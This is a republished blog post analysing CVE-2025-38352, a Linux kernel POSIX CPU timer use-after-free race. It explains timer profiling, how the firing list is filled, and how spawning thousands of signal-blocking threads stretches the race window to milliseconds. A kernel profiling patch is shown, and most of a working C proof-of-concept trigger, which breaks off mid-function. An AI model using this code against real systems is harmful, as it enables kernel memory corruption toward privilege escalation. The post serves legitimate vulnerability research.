2026-01-27 00:41:22 | Cybersecurity articles | Source: ZONE.CI Global Network

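Article summary: This article analyzes in detail how the exploit for CVE-2025-38352 was optimized. By precisely measuring the CPU time of system calls, filling the firing list, and creating a large number of threads that block the signal, it extends the race window to the millisecond range without any kernel patch, reliably triggers the kernel UAF, and provides complete PoC code. Overall score: 95. Categories: vulnerability analysis, vulnerability PoC, binary security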


CVE-2025-38352 Part 2 – Extending The Race Window Without a Kernel Patch

Faraz Faraz

securitainment

January 26, 2026, 13:37, Guangdong

| Link | Description |
| --- | --- |
| https://faith2dxy.xyz/2025-12-24/cve_2025_38352_analysis_part_2/ | Faraz |

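In part 1, I walked through how to build a PoC that triggers the vulnerability. Unfortunately, it had a few problems:

It almost never succeeds without the kernel patch I introduced (which artificially extends the race window by 500 ms).
The way the timer is set up is not very "clean". There is clearly a better way to consume a controlled amount of CPU time so that the timer fires at a controlled point in the future.

In this post, I will walk you through how I solved both problems and ended up with a PoC that needs no kernel patch at all.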

PoC + Demo

As usual, if you are only here for the PoC, here is the link:

https://github.com/farazsth98/poc-CVE-2025-38352/blob/main/poc.c

And a short demo (without KASAN)! 😄

demo

For reference, my QEMU launch command is:

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp 4 \
    -kernel ./bzImage \
    -initrd ./initramfs.tgz \
    -nographic \
    -append "console=ttyS0 kgdbwait kgdboc=ttyS1,115200 oops=panic panic=0 nokaslr" \
    -m 3G \
    -netdev user,id=mynet0 \
    -device virtio-net-pci,netdev=mynet0 \
    -s

Recap

Please read part 1 of this series before continuing!

In the previous PoC, I consumed CPU time in the REAPEE thread like this in order to trigger the bug:

void reapee(void) {
    // [ ... ]

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {
            .tv_sec = 0,
            .tv_nsec = wait_time, // Custom wait time
        },
    };

    // Wait for parent to attach
    pthread_barrier_wait(&barrier);

    SYSCHK(timer_settime(timer, 0, &ts, NULL));

    // Use some CPU time to make sure the timer will fire correctly
    for (int i = 0; i < 1000000; i++);

    // Hopefully we used enough CPU time to trigger the timer after `exit_notify()`
    // zombifies us and wakes up the parent process
    return;
}

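wait_time is passed in through argv, and the for loop count was basically an arbitrary value that happened to work. In essence, how much CPU time gets consumed after the timer is armed was completely uncontrolled.

Can we do better? Of course!

CPU Scheduler Internals (Not Really That Deep)

To understand how to control the CPU time a thread uses, I did a "semi-deep" dive into the CPU scheduler, POSIX timers, and how the different CPU timer types (CPUCLOCK_PROF, CPUCLOCK_VIRT, CPUCLOCK_SCHED) work.

Key Takeaways

I won't go too deep here (honestly, this deserves its own blog post), so here is a summary of the key points (which may not be 100% rigorous):

The CPU scheduler raises an interrupt every 1 / CONFIG_HZ seconds, and run_posix_cpu_timers() runs at that point.

This is generally the case on Android and Ubuntu kernels.
Typically CONFIG_HZ=1000, so one CPU scheduler "tick" happens roughly every 1 ms.

There are three main kinds of CPU clock timers:

CPUCLOCK_PROF: counts total userland + kernel CPU time.
CPUCLOCK_VIRT: counts total userland CPU time only.
CPUCLOCK_SCHED: counts the total time actually spent running on a CPU. This matters for threads that the scheduler frequently switches in and out.

Timer expiry is always checked on a tick boundary, so it is checked at most once every 1 / CONFIG_HZ seconds.

CPUCLOCK_PROF and CPUCLOCK_VIRT are only updated after 1 / CONFIG_HZ of CPU time has been consumed.
CPUCLOCK_SCHED is the exception: it is updated at nanosecond granularity.
This means CPUCLOCK_SCHED is commonly used for profiling when granularity finer than 1 ms is needed.

From a "triggering the bug" point of view, all three clock types should work in theory.

My PoC uses CLOCK_THREAD_CPUTIME_ID for its timers, which makes them CPUCLOCK_SCHED timers.
Why this particular type is used is explained later.

That should be enough to follow the rest of this post.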
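As a rough illustration of the point about CPUCLOCK_SCHED, the sketch below reads CLOCK_THREAD_CPUTIME_ID around a blocking sleep and around a busy loop. The helper names (thread_cpu_ns, cpu_ns_while_sleeping, cpu_ns_while_spinning) are made up for this example and are not part of the PoC; it assumes Linux with a POSIX clock_gettime.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <time.h>

// Total CPU time consumed so far by the calling thread, in nanoseconds.
long long thread_cpu_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts);
    return (long long)ts.tv_sec * 1000000000LL + ts.tv_nsec;
}

// CPU time charged to this thread across a blocking sleep of `ms` milliseconds.
long long cpu_ns_while_sleeping(long ms) {
    struct timespec req = { ms / 1000, (ms % 1000) * 1000000L };
    long long before = thread_cpu_ns();
    nanosleep(&req, NULL);
    return thread_cpu_ns() - before;
}

// CPU time charged to this thread across `iters` iterations of a busy loop.
long long cpu_ns_while_spinning(unsigned long iters) {
    volatile unsigned long sink = 0; // volatile keeps the loop from being optimized out
    long long before = thread_cpu_ns();
    for (unsigned long i = 0; i < iters; i++)
        sink += i;
    return thread_cpu_ns() - before;
}
```

Calling cpu_ns_while_sleeping(50) should report far less than the 50 ms of wall-clock time that passed, while cpu_ns_while_spinning() grows with the iteration count. This is the property the rest of the post relies on: a sleeping thread does not advance its own CPU-time clock.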

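Profiling CPU Time Usage

To consume a controlled amount of CPU time, we first need to know roughly how much time a specific "unit of work" takes.

When profiling, we need to be able to read the total CPU time consumed (by the thread being profiled) at two or more points of execution. The clock_gettime system call can be used for this.

As the "unit of work" to profile, I chose the getpid system call: it is easy to use and consumes very little CPU time.

Of course, the clock_gettime system call itself also consumes CPU time, so the profiling code has to account for that overhead as well.

To that end, here is some PoC code that estimates how much CPU time the getpid system call consumes (the full PoC is linked from the original post):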

#define NUM_SAMPLES 100000
static long int clock_gettime_avg = 0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
long int getpid_avg_cputime_used() {
    struct timespec *ts = malloc(NUM_SAMPLES * sizeof(struct timespec));

    if (clock_gettime_avg == 0) {
        for (int i = 0; i < NUM_SAMPLES; i++) {
            syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        }

        long int total_nsec = 0;

        for (int i = 0; i < NUM_SAMPLES-1; i++) {
            long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i]));
            total_nsec += time_taken;
        }

        clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
    }

    for (int i = 0; i < NUM_SAMPLES; i++) {
        syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);

        // Do whatever you're measuring here
        syscall(__NR_getpid);
    }

    long int total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES-1; i++) {
        long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i])) - clock_gettime_avg;
        total_nsec += time_taken;
    }

    free(ts);
    return total_nsec / (NUM_SAMPLES-1);
}

Here is the output from running it on my QEMU VM (4 cores, 3GB RAM):

/ # /poc
clock_gettime avg: 489 ns
getpid avg: 139 ns
/ # /poc
clock_gettime avg: 495 ns
getpid avg: 143 ns
/ # /poc
clock_gettime avg: 491 ns
getpid avg: 133 ns
/ # /poc
clock_gettime avg: 495 ns
getpid avg: 130 ns

Obviously, this PoC uses averages, so the timings are not 100% exact. But the CPU time of any system call will never be perfectly consistent between runs, so I think averaging is about the best we can do (at least that's what I think for now... if you have a better way to compute this, please let me know!)
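To make the averaging step easier to reason about in isolation, here is a minimal sketch of it as a pure function over already-captured timestamps. The name avg_cost_ns and the idea of passing the samples in as an array are assumptions for illustration; the PoC computes the same quantity inline.

```c
#include <stddef.h>

// Average gap between consecutive CPU-time samples (in ns), with a fixed
// per-sample measurement overhead subtracted from every gap.
long avg_cost_ns(const long long *samples_ns, size_t n, long overhead_ns) {
    if (n < 2)
        return 0; // at least two samples are needed to form one delta

    long long total = 0;
    for (size_t i = 0; i + 1 < n; i++)
        total += (samples_ns[i + 1] - samples_ns[i]) - overhead_ns;

    return (long)(total / (long long)(n - 1));
}
```

With synthetic samples spaced 630 ns apart and a 490 ns clock_gettime overhead, the function attributes 140 ns to the measured work, which is in the same range as the getpid figures shown in the output.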

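First Improvement: Controlled CPU Time Consumption

The first improvement to the PoC is to have the REAPEE thread consume CPU time in a more controlled way:

1. Use the profiling code to get the average CPU time of the getpid system call.
2. Set the timer to fire after 1 ms (1,000,000 ns) of CPU time has been consumed.
3. Loop the getpid system call enough times to consume close to 1 ms of CPU time (the key is to not use it up completely!).

At this point, the remaining CPU time is consumed by the kernel in do_exit() -> exit_notify(). If the getpid loop consumed just the right amount of CPU time, the timer should fire after exit_notify() has zombified the REAPEE thread and woken up the reaping parent process, which triggers handle_posix_cpu_timers().

Step 3 above could be made more precise by patching the kernel to profile the CPU time consumed in do_exit() -> exit_notify(), but I have not gone down that road yet.

Here are the corresponding changes in the PoC: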

// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
getpid_avg = getpid_cpu_usage();

// [ ... ]

// After timers are armed, waste just the right amount of CPU time now
// without firing any of the timers
for (int i = 0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
    syscall(__NR_getpid);
}

// This `return` will trigger `do_exit()` in the kernel, which hopefully will
// fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
// parent process
return;
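In the PoC above, syscall_loop_times is a variable that starts at 20 and is incremented on every retry, capped at SYSCALL_LOOP_TIMES_MAX=150 in my PoC. Because CPU time consumption is never exact, my final PoC increases this value on each retry to make sure the race window is eventually hit.

This change alone greatly increases the probability that handle_posix_cpu_timers() runs only after exit_notify() has woken up the reaping parent.

It also makes the PoC more system-agnostic, since different systems may consume different amounts of CPU time for the same amount of work.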
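As a worked example of the loop bound and the retry schedule, the sketch below pulls both out into small functions. The function names are hypothetical; the constants and the wrap-around rule are taken from the final PoC listed at the end of this post.

```c
#include <assert.h>

#define ONE_MS_NS 1000000LL
#define SYSCALL_LOOP_TIMES_MAX 150

// Number of getpid() calls to issue so that slightly less than 1 ms of CPU
// time is consumed, given the profiled average cost of one call.
long long getpid_loop_iterations(long getpid_avg_ns, int syscall_loop_times) {
    assert(getpid_avg_ns > 0);
    return ONE_MS_NS / getpid_avg_ns - syscall_loop_times;
}

// Retry schedule used by the wrapper process: 20, 21, ..., 150, then back to 20.
int next_syscall_loop_times(int current) {
    int next = (current + 1) % (SYSCALL_LOOP_TIMES_MAX + 1);
    return next == 0 ? 20 : next;
}
```

With the 139 ns average measured earlier and the initial value of 20, the loop runs 7,174 times, which accounts for roughly 7,174 × 139 = 997,186 ns and leaves about 2,814 ns of the 1 ms budget for the exit path (ignoring loop overhead and run-to-run variance). Each retry shaves one more getpid call off the loop.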

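Extending the Race Window (Part 1)

Now for the second (and arguably more annoying) problem: how do we extend the race window?

Using More Timers

The first improvement that comes to mind should be fairly intuitive. Recall that handle_posix_cpu_timers() collects all firing timers into a local firing list and then iterates over them (code below, simplified):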

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
    // Faith: local `firing` list
    LIST_HEAD(firing);

    if (!lock_task_sighand(tsk, &flags))
        return;

    do {
        // [ ... ]
        // Faith: collect all thread and process timers
        check_thread_timers(tsk, &firing);
        check_process_timers(tsk, &firing);
    } while (!posix_cpu_timers_enable_work(tsk, start));

    // [ ... ]
    unlock_task_sighand(tsk, &flags);

    // Faith: iterate over the `firing` list and fire the timers
    list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
        // [ ... ]
    }
}

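My previous PoC used only one timer, which means the loop over the firing list ran for a single iteration. That leaves us very little time to free the timer before it is used, right?

There are two things we can do to improve this:

Fill the firing list to its maximum capacity.
Make the last timer in the firing list our target UAF timer.

Also, handle_posix_cpu_timers() calls check_thread_timers() first and then check_process_timers(). Because timers are inserted at the tail of the firing list, process timers are of no use to us: they would all be inserted after our UAF timer.

That leaves only thread timers. So how many of them can we fit into the firing list?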

static void check_thread_timers(/* ... */)
{
    struct posix_cputimers *pct = &tsk->posix_cputimers;
    u64 samples[CPUCLOCK_MAX];
    // [ ... ]

    task_sample_cputime(tsk, samples);
    collect_posix_cputimers(pct, samples, firing);
    // [ ... ]
}

static void collect_posix_cputimers(/* ... */)
{
    // [ ... ]
    for (i = 0; i < CPUCLOCK_MAX; i++, base++) {
        base->nextevt = collect_timerqueue(&base->tqhead, firing,
                                           samples[i]);
    }
}

#define MAX_COLLECTED 20

static u64 collect_timerqueue(/* ... */)
{
    // [ ... ]
    while ((next = timerqueue_getnext(head))) {
        // [ ... ]
        /* Limit the number of timers to expire at once */
        if (++i == MAX_COLLECTED || now < expires)
            return expires;

        // [ ... Add the timer to the `firing` list's tail here ... ]
    }

    return U64_MAX;
}

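In the code above, CPUCLOCK_MAX covers the three clock types mentioned in the CPU Scheduler Internals section, so its value is 3.

Also note that the MAX_COLLECTED check in collect_timerqueue() above is effectively off by one: each clock type collects at most 19 timers, not 20.

Putting it together, we can collect at most 19 * 3 = 57 timers in the firing list. Even better, we get a bit of "luck": CPUCLOCK_SCHED (the clock type we use to create the UAF timer) happens to be the last clock type!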

#define CPUCLOCK_PROF  0
#define CPUCLOCK_VIRT  1
#define CPUCLOCK_SCHED 2
#define CPUCLOCK_MAX   3

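In my PoC, I only use 19 CPUCLOCK_SCHED timers, because that is already enough to extend the race window far enough to trigger the bug.

However, a real exploit will most likely need a cross-cache technique to reallocate the freed struct k_itimer as a different object, so I will probably end up using all 57 timers later. This is also why I chose CPUCLOCK_SCHED timers in the PoC: it gives us the largest potential race window.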
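The off-by-one in the MAX_COLLECTED check is easy to confirm with a small userland model. This is only a simplified sketch: collect_timerqueue_model and max_firing_list_len are hypothetical names, and the timer queue is reduced to "the first n_expired of n_queued timers have expired".

```c
#define MAX_COLLECTED 20
#define CPUCLOCK_MAX 3

// Simplified model of collect_timerqueue(): `n_queued` timers sorted by
// expiry, of which the first `n_expired` have already expired. Returns how
// many timers get moved to the firing list.
int collect_timerqueue_model(int n_queued, int n_expired) {
    int i = 0, collected = 0;

    for (int idx = 0; idx < n_queued; idx++) {
        int expired = idx < n_expired;

        // Same shape as the kernel check: the counter is pre-incremented and
        // compared before the timer is added, so the 20th timer is never added.
        if (++i == MAX_COLLECTED || !expired)
            return collected;

        collected++;
    }

    return collected;
}

// Upper bound on the firing list length when every clock type is saturated.
int max_firing_list_len(void) {
    return CPUCLOCK_MAX * collect_timerqueue_model(100, 100);
}
```

Even with 100 expired timers queued on one clock, the model collects 19, and three saturated clocks give the 57 entries quoted above.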

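Firing All Timers at Once

To make all the timers fire at the same time, we can rely on the fact that a CLOCK_THREAD_CPUTIME_ID timer only advances while the thread that created it is consuming CPU time.

So, to make 19 timers fire together, we just need to:

Create all 19 CPU timers (18 "stall" timers + our UAF timer) on the REAPEE thread, then put it to sleep.

Make sure it is not a busy sleep, since that would consume CPU time.
I use a pthread_barrier_t for this.

Call timer_settime() from another thread to arm every timer to fire after 1,000,000 ns (1 ms) of CPU time has been consumed.

Since this thread did not create the timers, they do not advance at all (the sleeping REAPEE thread is the only thread that can advance them).

Make sure the 18 "stall" timers are set to fire after 1,000,000 - 1 ns of CPU time.

The UAF timer still has to fire after 1,000,000 ns of CPU time.
This guarantees that the UAF timer is the last one in the firing list, because the firing list is ordered by expiry time.

Once that is done, we can wake up the REAPEE thread and use the improvement from the previous section to consume just under 1 ms of CPU time, which triggers handle_posix_cpu_timers() at the right moment.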

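How Much Does It Help?

To find out how much CPU time iterating over the firing list in handle_posix_cpu_timers() actually takes, I used this kernel patch. I made sure it does not accidentally extend the race window (my final PoC does not depend on this patch).

The key part of the patch is shown below. It profiles the time taken to iterate over the firing list and fire each timer: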

@@ -1356,6 +1362,10 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
     */
    unlock_task_sighand(tsk, &flags);

+   // Faith: profile the time taken to handle the timers
+   if (profile)
+       profile_t0 = ktime_get_mono_fast_ns();
+
    /*
     * Now that all the timers on our list have the firing flag,
     * no one will touch their list entries but us.  We'll take
@@ -1387,6 +1397,13 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
        rcu_assign_pointer(timer->it.cpu.handling, NULL);
        spin_unlock(&timer->it_lock);
    }
+
+   // Faith: profile the time taken to handle the timers
+   if (profile) {
+       profile_t1 = ktime_get_mono_fast_ns();
+       printk("handle_posix_cpu_timers: delta_ns=%llu\n",
+              (unsigned long long)(profile_t1 - profile_t0));
+   }

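The PoC I used to test this profiling code is here. Note that this profiling PoC also contains changes that extend the race window further (I discuss them in the next section).

The key parts of this PoC are (you can also just follow the link):

The REAPEE thread creates 19 timers and goes to sleep.
The main thread arms all 19 timers and wakes up the REAPEE thread.
The REAPEE thread consumes enough CPU time to trigger handle_posix_cpu_timers().

The dmesg log after running this PoC looks like this (without the extra changes that extend the race window further):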

~ $ /poc
[   10.543155] handle_posix_cpu_timers: delta_ns=3140
~ $ /poc
[   10.964147] handle_posix_cpu_timers: delta_ns=4990
~ $ /poc
[   11.404146] handle_posix_cpu_timers: delta_ns=6000

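On average, iterating over the 19 timers in the firing list takes roughly 4000-7000 ns.

In my testing, this is still not enough to trigger the bug:

After reaping the zombie REAPEE thread, it is still very hard to make timer_delete() land inside this window.
Even if we "win" the race, there is almost no time for the RCU free to happen.

So we have to find a way to extend the race window even further... nanoseconds are not enough, we need milliseconds!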

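Extending the Race Window (Part 2)

At a high level, there are two more ideas for extending the race window:

When iterating over the list, the code tries to take timer->it_lock, and later also takes task->sighand->siglock. If another CPU could hold these locks for a long time at the right moment, the race window would be extended.
Firing a timer involves sending signals, re-arming timers, and a bunch of other logic. Maybe that path can be studied for a way to stretch the race window?

Option 1: Lock Collisions

I audited every code path that takes timer->it_lock and task->sighand->siglock, looking for any that can hold the lock for a long time. This idea has several problems.

The first problem is that the race window is too short: not only do we have to grab one of the locks inside the window, we have to grab it at the exact moment the firing list loop is about to take that lock for a specific timer / task. That is practically impossible in a 4000-7000 ns window.

The second problem is that I could not find any code path that holds these locks for a large or controllable amount of time. For example, timer_gettime() does call copy_to_user(), but it releases timer->it_lock before doing so. In general, every path takes the lock and releases it quickly.

However, I previously learned from one of Jann Horn's blog posts that preemptible kernels (such as the Android kernel) can in theory preempt code at any point, unless the code runs in a context where preemption is disabled.

Knowing this, I wondered: could a task on another CPU grab timer->it_lock / task->sighand->siglock and then get preempted, "jamming" the lock for longer?

Unfortunately not. Both locks are taken via spin_lock() / spin_lock_irq() / spin_lock_irqsave(), which disable preemption while the lock is held.

So the lock collision approach can be ruled out entirely.

Option 2: Making Timers Take Longer to Fire

I spent a fair amount of time auditing cpu_timer_fire() to see how the timer firing logic is implemented. I was mainly looking for loops whose iteration count I could influence from userland.

complete_signal() caught my attention. It can be reached through the following call stack: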

handle_posix_cpu_timers()
-> cpu_timer_fire()
-> posix_timer_queue_signal()
-> send_sigqueue()
-> complete_signal()

In complete_signal(), I noticed two while loops (code below, simplified):

static void complete_signal(int sig, struct task_struct *p, enum pid_type type)
{
    // [ ... ]
    // Faith: If a PID is specified to deliver the signal to, and that thread / process
    //        is accepting this signal, use it
    if (wants_signal(sig, p))
        t = p;
    // Faith: Else if that PID does not accept this signal, and the signal is
    //        directed at that specific thread or there are no other threads,
    //        just return early.
    else if ((type == PIDTYPE_PID) || thread_group_empty(p))
        return;
    else {
        // Faith: iterate over every thread until we find one that is accepting this
        //        signal
        t = signal->curr_target;
        while (!wants_signal(sig, t)) {
            t = next_thread(t);
            if (t == signal->curr_target)
                // Faith: no thread found accepting this signal, just return
                return;
        }
        signal->curr_target = t;
    }

    // Faith: If a fatal signal is detected (and some other conditions)
    if (sig_fatal(p, sig) &&
        (signal->core_state || !(signal->flags & SIGNAL_GROUP_EXIT)) &&
        !sigismember(&t->real_blocked, sig) &&
        (sig == SIGKILL || !p->ptrace)) {
        // [ ... ]
        // Faith: The code here iterates over every thread in this thread
        //        group and delivers a `SIGKILL` to it to kill it.
    }
    // [ ... ]
}

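In the code above, there are two loops:

If we have the timer send its signal without specifying a TID, we enter the first while loop. It walks every thread in the thread group looking for one that has not blocked the signal (signals can be blocked with sigprocmask()).
The second loop is elided in my snippet; it is only entered when the signal being delivered is considered fatal (plus a few other conditions). It kills every thread in the thread group.

I think the second loop is basically unusable in practice, because it kills the whole thread group. I don't want to rule it out completely though 😅 There may be a scenario where multiple processes can be synchronized to fire their timers on the same CPU. In that scenario, the other "unrelated" processes could be killed without affecting the main exploit process, which might make the second loop usable. I have not tested or verified this.

In my PoC, I only use the first while loop to extend the race window. Let's see how.

Second Improvement: Spamming Threads

From the analysis of complete_signal() above, we know it iterates over every thread in the current process until it finds one that is willing to accept the signal.

So how is wants_signal() implemented? (code below, simplified)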

static inline bool wants_signal(int sig, struct task_struct *p)
{
    if (sigismember(&p->blocked, sig))
        return false;

    // [ ... ]
}

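wants_signal() has a few other conditions as well, but the first thing it checks is whether the thread has blocked the signal the timer is trying to send.

The ->blocked field holds a bitmap of the signals that are blocked. We can add signals to it with sigprocmask() + SIG_BLOCK (code below, simplified):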

int sigprocmask(int how, sigset_t *set, sigset_t *oldset)
{
    // [ ... ]
    switch (how) {
    case SIG_BLOCK:
        sigorsets(&newset, &tsk->blocked, set);
        break;
    // [ ... ]
    }

    __set_current_blocked(&newset);
    return 0;
}

Putting this together, we can force the kernel to run this while loop many times for every "stall" timer. The only limit is how many threads we can create.
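The approach depends on newly created threads starting with the creator's signal mask. A minimal userland sketch of that behavior is below; new_thread_inherits_block and report_blocked are hypothetical helper names, and the sketch uses pthread_sigmask() where the PoC calls sigprocmask() (on Linux both update the calling thread's mask). Build with -pthread.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <pthread.h>
#include <signal.h>
#include <stddef.h>

// Thread body: on entry *arg holds a signal number; on exit it holds 1 if
// that signal is blocked in this new thread's mask, 0 otherwise.
static void *report_blocked(void *arg) {
    int *signo_inout = arg;
    sigset_t cur;

    pthread_sigmask(SIG_BLOCK, NULL, &cur); // NULL set: only query the mask
    *signo_inout = sigismember(&cur, *signo_inout);
    return NULL;
}

// Block `signo` in the calling thread, spawn a thread, and return 1 if the
// new thread started with `signo` blocked, 0 if not, -1 on error.
int new_thread_inherits_block(int signo) {
    sigset_t mask, old;
    sigemptyset(&mask);
    sigaddset(&mask, signo);
    if (pthread_sigmask(SIG_BLOCK, &mask, &old) != 0)
        return -1;

    int result = signo;
    pthread_t t;
    if (pthread_create(&t, NULL, report_blocked, &result) != 0) {
        pthread_sigmask(SIG_SETMASK, &old, NULL);
        return -1;
    }
    pthread_join(t, NULL);

    // Restore the caller's original mask before returning
    pthread_sigmask(SIG_SETMASK, &old, NULL);
    return result;
}
```

Calling new_thread_inherits_block(SIGUSR1) should return 1, which is why blocking SIGUSR1 once, before any threads exist, is enough to make every later thread fail the wants_signal() check.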

The steps are:

Before the exploit child process creates any threads, block SIGUSR1 with sigprocmask().

The exploit child process is the process that contains the REAPEE thread.

Create the REAPEE thread. When creating the timers, make sure the timer's sigevent.sigev_notify is set to SIGEV_SIGNAL.

This attempts to deliver the signal to any thread in the current thread group that accepts it.

Create as many threads as possible in the exploit child process (I use NUM_SLEEP_THREADS=10000).

These threads (and the REAPEE thread above) inherit the exploit child process's blocked SIGUSR1 state.

Continue triggering the bug as before.

When the timers fire, the firing list loop in handle_posix_cpu_timers() calls complete_signal() once per timer, and each call iterates NUM_SLEEP_THREADS=10000 times in the while loop of complete_signal() before returning.
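The cost of that search can be sketched with a tiny model of the loop. This is a simplification under stated assumptions: threads are reduced to ring indices, index 0 stands in for signal->curr_target, and thread_search_steps is a hypothetical name, not a kernel function.

```c
// Simplified model of the thread-search loop in complete_signal().
// Threads are numbered 0..n_threads-1 in a ring, the search starts at
// thread 0, and `first_willing` is the index of the first thread that does
// not block the signal, or -1 if every thread blocks it.
// Returns how many times the loop body (the next_thread() step) runs.
long thread_search_steps(long n_threads, long first_willing) {
    if (n_threads <= 0)
        return 0;

    long steps = 0;
    long t = 0;
    while (t != first_willing) {     // models !wants_signal(sig, t)
        t = (t + 1) % n_threads;     // models t = next_thread(t)
        steps++;
        if (t == 0)                  // wrapped around to curr_target: give up
            break;
    }
    return steps;
}
```

When no thread accepts the signal, the loop only ends after a full lap, so the step count equals the thread count. With 19 timers and about 10,000 blocked threads, that is on the order of 190,000 loop steps per firing list traversal.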

I implemented this in the same profiling PoC. With the second improvement added, the results are:

~ $ /poc
[    2.386969] handle_posix_cpu_timers: delta_ns=4895749
~ $ /poc
[    3.101971] handle_posix_cpu_timers: delta_ns=3904588
~ $ /poc
[    3.679125] handle_posix_cpu_timers: delta_ns=4052398

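A huge improvement! Iterating over the firing list now takes roughly 4,000,000-5,000,000 ns (4-5 ms)! That is definitely enough for us to both:

Hit timer_delete() inside the race window.
Give the RCU free time to complete, triggering the UAF.

At this point, the PoC can trigger the race condition without any artificial kernel patch.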
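As a back-of-the-envelope check on these numbers, the measured deltas can be divided by the number of thread-search steps. The helper below is a hypothetical sketch that assumes the whole delta is spent in the complete_signal() search loop, which slightly overstates the per-step cost.

```c
#include <assert.h>

// Rough cost of one thread-search step, assuming `timers` calls to
// complete_signal() that each walk `threads` blocked threads.
unsigned long long ns_per_step(unsigned long long delta_ns,
                               unsigned timers, unsigned threads) {
    assert(timers > 0 && threads > 0);
    return delta_ns / ((unsigned long long)timers * threads);
}
```

For the three runs above this gives about 20-25 ns per step (for example 4,895,749 / 190,000 ≈ 25), and the total is roughly three orders of magnitude larger than the 3,140-6,000 ns measured before threads were added.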

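Other Improvements and Ideas

I also made a few extra improvements to the final PoC:

I built the retry logic directly into the PoC, so you only need to run /poc instead of while true; do /poc; done.
I added a 1 ms sleep before deleting the timer. Since the race window stays open for at least 3 ms, this sleep helps make sure timer_delete() really lands inside the race window.

Plans for Part 3?

As of writing, I definitely plan to keep working on an exploit for this bug. Cross-cache is entirely feasible here; the key is figuring out when we won the race and when we lost it.

That said, it is the holiday season, so it may be a while before I actually wrap this up. But rest assured: this bug is great for practicing and improving exploit development skills, so I am confident I will see it through! 😄

Conclusion

As always, if you have any questions, feel free to ask!

Final PoC

The final PoC, the kernel profiler patch (and the profiling PoC I used to measure the race window length) are all in my Github repo:

https://github.com/farazsth98/poc-CVE-2025-38352

I will also put the demo and the PoC below. That's it for this post!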

demo

#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>

#define SYSCHK(x) ({              \
    typeof(x) __res = (x);        \
    if (__res == (typeof(x))-1)   \
        err(1, "SYSCHK(" #x ")"); \
    __res;                        \
})

#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define NUM_SLEEP_THREADS 10000
#define NUM_SLEEP_THREADS_KASAN 4500 // KASAN has a smaller thread limit
#define SYSCALL_LOOP_TIMES_MAX 150

void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

void wait_for_rcu() {
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}

static inline long long ts_to_ns(const struct timespec *ts) {
    return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}

static long int clock_gettime_avg = 0;
static long int getpid_avg = 0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
long int getpid_cpu_usage() {
    struct timespec *ts = malloc(NUM_SAMPLES * sizeof(struct timespec));

    // If we don't have `clock_gettime` avg CPU time usage, get it now
    if (clock_gettime_avg == 0) {
        for (int i = 0; i < NUM_SAMPLES; i++) {
            syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        }

        long int total_nsec = 0;

        for (int i = 0; i < NUM_SAMPLES-1; i++) {
            long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i]));
            total_nsec += time_taken;
        }

        clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
    }

    for (int i = 0; i < NUM_SAMPLES; i++) {
        syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        syscall(__NR_getpid);
    }

    long int total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES-1; i++) {
        long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i])) - clock_gettime_avg;
        total_nsec += time_taken;
    }

    free(ts);
    return total_nsec / (NUM_SAMPLES-1);
}

/* Global variables for exploit setup START */
pthread_barrier_t barrier;

// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];
timer_t uaf_timer;

// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t reapee_thread;

int e2w[2]; // exploit process to wrapper process comm pipefds
int c2p[2]; // child to parent comm pipefds
int p2c[2]; // parent to child comm pipefds
int stall_fds[2]; // stall pipe fds for the sleep func

// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 20;
int retry_count = 0;
/* Global variables for exploit setup END */

void reapee_func(void) {
    // Pin to same CPU as sleeper threads
    pin_on_cpu(2);
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_SIGNAL;
    sev.sigev_signo = SIGUSR1;
    char m;

    prctl(PR_SET_NAME, "REAPEE");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    // Wait for parent to attach and continue
    pthread_barrier_wait(&barrier); // barrier 1

    // Create the maximum amount of timers minus one
    for (int i = 0; i < NUM_TIMERS; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &stall_timers[i]));
    }

    // Create the UAF timer as the last timer
